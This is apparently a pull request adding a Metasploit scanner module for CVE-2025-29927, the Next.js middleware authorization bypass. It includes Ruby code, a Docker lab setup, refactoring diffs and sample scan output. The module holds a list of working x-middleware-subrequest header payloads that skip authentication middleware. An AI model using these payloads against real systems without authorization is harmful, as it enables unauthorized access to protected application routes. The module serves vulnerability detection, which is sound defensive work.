### PR TITLE
Add Next.js middleware authorization bypass scanner (CVE-2025-29927)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.md
+++ b/documentation/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.md
@@ -1,0 +1,129 @@
+## Vulnerable Application
+
+[Next.js](https://nextjs.org/) is a React framework. Self-hosted Next.js
+applications (`next start` / standalone output) are affected by
+[CVE-2025-29927](https://github.com/advisories/GHSA-f82v-jwr5-mffw), an
+authorization bypass in the middleware layer (CVSS 9.1).
+
+Next.js tags its own internal subrequests with the `x-middleware-subrequest`
+header and skips middleware execution when it sees that header. The header is
+trusted without verifying that it originated internally, so an external client
+that supplies it causes middleware to be skipped entirely — bypassing any
+authentication, authorization, redirects, or security headers implemented in
+`middleware.ts`. The header value is the middleware module name (`middleware`, or
+`src/middleware` when it lives under `src/`); on Next.js 13.2+ the name must be
+repeated five times to satisfy the internal recursion-depth check.
+
+Affected (self-hosted) versions:
+
+| Branch | Affected | Patched |
+|---|---|---|
+| 15.x | `< 15.2.3` | 15.2.3 |
+| 14.x | `< 14.2.25` | 14.2.25 |
+| 13.x | `< 13.5.9` | 13.5.9 |
+| 12.x / 11.1.4+ | `< 12.3.5` | 12.3.5 |
+
+Vercel- and Netlify-hosted deployments are not affected (the platforms strip the
+header).
+
+This module performs a differential check against a user-supplied, normally
+middleware-gated path: a baseline request (expecting a redirect or 401/403), then
+the same request with a crafted `x-middleware-subrequest` header. If the gate
+disappears, the target is vulnerable. It is detection only.
+
+### Setup with Docker
+
+The lab uses `node:` containers so the host does not need Node installed. The app
+gates `/dashboard` behind a `session` cookie, redirecting unauthenticated requests
+to `/login`.
+
+Create the shared middleware:
+
+```
+mkdir -p ~/nextjs-cve-lab && cd ~/nextjs-cve-lab
+cat > middleware.ts <<'EOF'
+import { NextResponse } from 'next/server'
+import type { NextRequest } from 'next/server'
+
+export function middleware(req: NextRequest) {
+  if (!req.cookies.get('session')) {
+    return NextResponse.redirect(new URL('/login', req.url))
+  }
+  return NextResponse.next()
+}
+
+export const config = { matcher: ['/dashboard/:path*'] }
+EOF
+```
+
+Vulnerable instance (Next.js 15.2.2) on port 3000:
+
+```
+docker run --rm -d --name next-vuln -p 3000:3000 -v "$PWD":/work -w /work node:20 bash -c '
+  npx --yes create-next-app@15.2.2 app --ts --app --no-tailwind --no-eslint --no-src-dir --no-import-alias --use-npm &&
+  cd app && cp /work/middleware.ts middleware.ts &&
+  mkdir -p app/dashboard app/login &&
+  printf "export default function P(){return <h1>SECRET DASHBOARD</h1>}\n" > app/dashboard/page.tsx &&
+  printf "export default function L(){return <h1>LOGIN</h1>}\n" > app/login/page.tsx &&
+  npm run build && npx --yes next start -p 3000 -H 0.0.0.0'
+```
+
+Patched instance (Next.js 15.2.3) on port 3001 — identical, pinning `15.2.3` and
+mapping `-p 3001:3000`.
+
+## Verification Steps
+
+1. Start a vulnerable Next.js instance (see Setup with Docker)
+1. Start `msfconsole`
+1. Do: `use auxiliary/scanner/http/nextjs_middleware_auth_bypass`
+1. Do: `set RHOSTS <target>`
+1. Do: `set RPORT 3000`
+1. Do: `set TARGETURI /dashboard`
+1. Do: `run`
+1. The module reports the bypass when the gated path becomes accessible under the header
+
+## Options
+
+### TARGETURI
+
+A path that is normally gated by Next.js middleware — for example an authenticated
+route that redirects unauthenticated users to a login page, or returns 401/403.
+Defaults to `/dashboard`. The module reports "not applicable" if the baseline
+request to this path is not gated.
+
+### SUBREQUEST_PAYLOAD
+
+Optional. Force a single `x-middleware-subrequest` value instead of trying the
+built-in list (modern 5x `middleware`, `src/middleware`, single forms, and the
+legacy `pages/_middleware`).
+
+## Scenarios
+
+### Next.js 15.2.2 (vulnerable)
+
+```
+msf6 > use auxiliary/scanner/http/nextjs_middleware_auth_bypass
+msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > set TARGETURI /dashboard
+TARGETURI => /dashboard
+msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > set RPORT 3000
+RPORT => 3000
+msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > run
+
+[+] 127.0.0.1:3000        - Next.js middleware authorization bypass confirmed (CVE-2025-29927): HTTP 307 -> /login -> HTTP 200 with x-middleware-subrequest 'middleware:middleware:middleware:middleware:middleware'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Next.js 15.2.3 (patched, true-negative)
+
+```
+msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > set RPORT 3001
+RPORT => 3001
+msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > run
+
+[*] 127.0.0.1:3001        - /dashboard gated (HTTP 307 -> /login); not bypassed (patched or not Next.js middleware)
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.rb
@@ -1,0 +1,168 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  # HTTP status codes that indicate the request was gated (blocked or redirected)
+  # by middleware rather than served.
+  GATE_CODES = [301, 302, 303, 307, 308, 401, 403].freeze
+
+  # x-middleware-subrequest values to try, covering Next.js 12.2 through 15.x.
+  # Next.js >= ~13.2 only skips middleware once the middleware module name appears
+  # five times (MAX_RECURSION_DEPTH); earlier lines accept a single occurrence, and
+  # the "src/" variants apply when middleware lives under a src/ directory.
+  PAYLOADS = [
+    'middleware:middleware:middleware:middleware:middleware',
+    'src/middleware:src/middleware:src/middleware:src/middleware:src/middleware',
+    'middleware',
+    'src/middleware',
+    'pages/_middleware'
+  ].freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Next.js Middleware Authorization Bypass Scanner',
+        'Description' => %q{
+          This module detects self-hosted Next.js applications affected by
+          CVE-2025-29927, an authorization bypass in the middleware layer. Next.js
+          tags its own internal subrequests with the x-middleware-subrequest header
+          and skips middleware when it sees it. The header is trusted without
+          verifying it originated internally, so an external client that supplies it
+          causes middleware to be skipped entirely, bypassing any authentication,
+          authorization, or redirects implemented there. Affected self-hosted
+          versions are < 12.3.5, < 13.5.9, < 14.2.25, and < 15.2.3.
+
+          The module performs a differential check: it sends a baseline request to a
+          user-supplied, normally middleware-gated path (expecting a redirect or a
+          401/403), then repeats the request with a crafted x-middleware-subrequest
+          header. If the gate disappears (the protected resource is served, or the
+          middleware redirect to login is gone), the target is reported vulnerable.
+          This is detection only; the module does not act on the bypassed response.
+        },
+        'Author' => [
+          'Rachid Allam', # vulnerability discovery (zhero)
+          'Yasser Allam', # vulnerability discovery (inzo)
+          'Kenneth LaCroix' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2025-29927'],
+          ['GHSA', 'f82v-jwr5-mffw'],
+          ['URL', 'https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass']
+        ],
+        'DisclosureDate' => '2025-03-21',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DefaultOptions' => { 'RPORT' => 3000, 'SSL' => false }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'A path normally gated by Next.js middleware (e.g. an authenticated route that redirects to login)', '/dashboard']),
+        OptString.new('SUBREQUEST_PAYLOAD', [false, 'Force a single x-middleware-subrequest value instead of trying the built-in list', ''])
+      ]
+    )
+  end
+
+  def payloads
+    forced = datastore['SUBREQUEST_PAYLOAD'].to_s
+    forced.empty? ? PAYLOADS : [forced]
+  end
+
+  # Best-effort Next.js fingerprint, used for reporting only (the differential is the
+  # authoritative signal; the header may be stripped by a proxy).
+  def nextjs?(res)
+    return false unless res
+    return true if res.headers['X-Powered-By'].to_s.include?('Next.js')
+    return true if res.headers.keys.any? { |k| k.downcase.start_with?('x-nextjs-') }
+
+    res.body.to_s.include?('/_next/static/')
+  end
+
+  def describe_response(res)
+    loc = res.headers['location'].to_s
+    loc.empty? ? "HTTP #{res.code}" : "HTTP #{res.code} -> #{loc}"
+  end
+
+  def baseline_request
+    send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+  end
+
+  def gated_baseline
+    res = baseline_request
+    res && GATE_CODES.include?(res.code) ? res : nil
+  end
+
+  # Returns [payload, bypass_response] for the first payload that defeats the gate,
+  # or nil. Relative to the gated baseline, a bypass is detected when the middleware
+  # gate no longer applies: either the response is no longer a gate status (e.g. the
+  # protected page is served with 200), or it is still a redirect but to a different
+  # target (the middleware login redirect is gone, e.g. trailing-slash normalization
+  # to the real route). Comparing the Location avoids missing a same-status bypass.
+  def bypassing_payload(baseline)
+    base_loc = baseline.headers['location'].to_s
+    payloads.each do |payload|
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'headers' => { 'x-middleware-subrequest' => payload }
+      )
+      next unless res
+      next if res.code >= 500
+
+      gate_gone = !GATE_CODES.include?(res.code) && res.code != baseline.code
+      redirect_changed = GATE_CODES.include?(res.code) &&
+                         (res.code != baseline.code || res.headers['location'].to_s != base_loc)
+      return [payload, res] if gate_gone || redirect_changed
+    end
+    nil
+  end
+
+  def check_host(_ip)
+    baseline = baseline_request
+    return Exploit::CheckCode::Unknown('No response to the baseline request') unless baseline
+    unless GATE_CODES.include?(baseline.code)
+      return Exploit::CheckCode::Detected("#{target_uri.path} is not middleware-gated (#{describe_response(baseline)}); set TARGETURI to a protected path")
+    end
+
+    hit = bypassing_payload(baseline)
+    return Exploit::CheckCode::Safe("#{target_uri.path} gated (#{describe_response(baseline)}); not bypassed") if hit.nil?
+
+    Exploit::CheckCode::Vulnerable("Middleware bypassed: #{describe_response(baseline)} -> #{describe_response(hit[1])} with '#{hit[0]}'")
+  end
+
+  def run_host(_ip)
+    baseline = gated_baseline
+    if baseline.nil?
+      vprint_status("#{peer} - #{target_uri.path} is not middleware-gated; set TARGETURI to a protected path")
+      return
+    end
+    vprint_status("#{peer} - Baseline #{describe_response(baseline)} on #{target_uri.path}#{nextjs?(baseline) ? ' (Next.js detected)' : ''}")
+
+    hit = bypassing_payload(baseline)
+    if hit.nil?
+      print_status("#{peer} - #{target_uri.path} gated (#{describe_response(baseline)}); not bypassed (patched or not Next.js middleware)")
+      return
+    end
+
+    print_good("#{peer} - Next.js middleware authorization bypass confirmed (CVE-2025-29927): #{describe_response(baseline)} -> #{describe_response(hit[1])} with x-middleware-subrequest '#{hit[0]}'")
+    report_vuln(
+      host: rhost,
+      port: rport,
+      name: name,
+      info: "x-middleware-subrequest bypass on #{target_uri.path}; #{describe_response(baseline)} -> #{describe_response(hit[1])}",
+      refs: references
+    )
+  end
+end

--- a/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Auxiliary
     res && GATE_CODES.include?(res.code) ? res : nil
   end
 
-  # Returns [payload, bypass_response] for the first payload that defeats the gate,
+  # Returns { payload:, response: } for the first payload that defeats the gate,
   # or nil. Relative to the gated baseline, a bypass is detected when the middleware
   # gate no longer applies: either the response is no longer a gate status (e.g. the
   # protected page is served with 200), or it is still a redirect but to a different
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Auxiliary
       gate_gone = !GATE_CODES.include?(res.code) && res.code != baseline.code
       redirect_changed = GATE_CODES.include?(res.code) &&
                          (res.code != baseline.code || res.headers['location'].to_s != base_loc)
-      return [payload, res] if gate_gone || redirect_changed
+      return { payload: payload, response: res } if gate_gone || redirect_changed
     end
     nil
   end
@@ -139,7 +139,7 @@ class MetasploitModule < Msf::Auxiliary
     hit = bypassing_payload(baseline)
     return Exploit::CheckCode::Safe("#{target_uri.path} gated (#{describe_response(baseline)}); not bypassed") if hit.nil?
 
-    Exploit::CheckCode::Vulnerable("Middleware bypassed: #{describe_response(baseline)} -> #{describe_response(hit[1])} with '#{hit[0]}'")
+    Exploit::CheckCode::Vulnerable("Middleware bypassed: #{describe_response(baseline)} -> #{describe_response(hit[:response])} with '#{hit[:payload]}'")
   end
 
   def run_host(_ip)
@@ -156,12 +156,12 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    print_good("#{peer} - Next.js middleware authorization bypass confirmed (CVE-2025-29927): #{describe_response(baseline)} -> #{describe_response(hit[1])} with x-middleware-subrequest '#{hit[0]}'")
+    print_good("#{peer} - Next.js middleware authorization bypass confirmed (CVE-2025-29927): #{describe_response(baseline)} -> #{describe_response(hit[:response])} with x-middleware-subrequest '#{hit[:payload]}'")
     report_vuln(
       host: rhost,
       port: rport,
       name: name,
-      info: "x-middleware-subrequest bypass on #{target_uri.path}; #{describe_response(baseline)} -> #{describe_response(hit[1])}",
+      info: "x-middleware-subrequest bypass on #{target_uri.path}; #{describe_response(baseline)} -> #{describe_response(hit[:response])}",
       refs: references
     )
   end

--- a/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.rb
@@ -99,11 +99,6 @@ class MetasploitModule < Msf::Auxiliary
     send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
   end
 
-  def gated_baseline
-    res = baseline_request
-    res && GATE_CODES.include?(res.code) ? res : nil
-  end
-
   # Returns { payload:, response: } for the first payload that defeats the gate,
   # or nil. Relative to the gated baseline, a bypass is detected when the middleware
   # gate no longer applies: either the response is no longer a gate status (e.g. the
@@ -143,9 +138,13 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(_ip)
-    baseline = gated_baseline
+    baseline = baseline_request
     if baseline.nil?
-      vprint_status("#{peer} - #{target_uri.path} is not middleware-gated; set TARGETURI to a protected path")
+      print_error("#{peer} - No response to the baseline request on #{target_uri.path}")
+      return
+    end
+    unless GATE_CODES.include?(baseline.code)
+      vprint_status("#{peer} - #{target_uri.path} is not middleware-gated (#{describe_response(baseline)}); set TARGETURI to a protected path")
       return
     end
     vprint_status("#{peer} - Baseline #{describe_response(baseline)} on #{target_uri.path}#{nextjs?(baseline) ? ' (Next.js detected)' : ''}")


### PR DESCRIPTION
## Summary

Adds `auxiliary/scanner/http/nextjs_middleware_auth_bypass`, a detection module for
[CVE-2025-29927](https://github.com/advisories/GHSA-f82v-jwr5-mffw) (CVSS 9.1) — an
authorization bypass in self-hosted [Next.js](https://nextjs.org/) applications.

## Vulnerability

Next.js tags its own internal subrequests with the `x-middleware-subrequest` header
and skips middleware when it sees it. The header is trusted without verifying it
originated internally, so an external client that supplies it makes Next.js skip
middleware execution entirely — bypassing any authentication, authorization, or
redirects implemented in `middleware.ts`. The header value is the middleware module
name; on Next.js 13.2+ it must be repeated five times to satisfy the internal
recursion-depth check. Affected self-hosted versions: `< 12.3.5`, `< 13.5.9`,
`< 14.2.25`, `< 15.2.3`. (Vercel/Netlify-hosted apps are not affected — the platforms
strip the header.)

## What the module does

This is a **detection** module (the impact is app-specific). It performs a
differential check against a user-supplied, normally middleware-gated path
(`TARGETURI`):

1. A baseline request that is expected to be gated (a redirect to login, or 401/403).
2. The same request with a crafted `x-middleware-subrequest` header (it iterates the
   known per-version payloads).

If the gate disappears — the protected resource is served, or the middleware login
redirect is gone — the target is reported vulnerable. It only reports; it does not
act on the bypassed response.

## Verification

Tested against minimal self-hosted Next.js apps (App Router, a `middleware.ts` that
redirects `/dashboard` to `/login`) at a vulnerable and a patched version:

```
msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > set TARGETURI /dashboard
msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > set RPORT 3000   # Next.js 15.2.2
msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > run
[+] 127.0.0.1:3000        - Next.js middleware authorization bypass confirmed (CVE-2025-29927): HTTP 307 -> /login -> HTTP 200 with x-middleware-subrequest 'middleware:middleware:middleware:middleware:middleware'

msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > set RPORT 3001   # Next.js 15.2.3 (patched)
msf6 auxiliary(scanner/http/nextjs_middleware_auth_bypass) > run
[*] 127.0.0.1:3001        - /dashboard gated (HTTP 307 -> /login); not bypassed (patched or not Next.js middleware)
```

Documentation with the full Docker lab setup and scenarios is included at
`documentation/modules/auxiliary/scanner/http/nextjs_middleware_auth_bypass.md`.

## Verification Steps

1. Start a vulnerable self-hosted Next.js app with a middleware-gated route (see docs)
2. `use auxiliary/scanner/http/nextjs_middleware_auth_bypass`
3. `set RHOSTS <target>`
4. `set TARGETURI <a middleware-gated path>`
5. `run` — the module reports the bypass when the gate is removed under the header
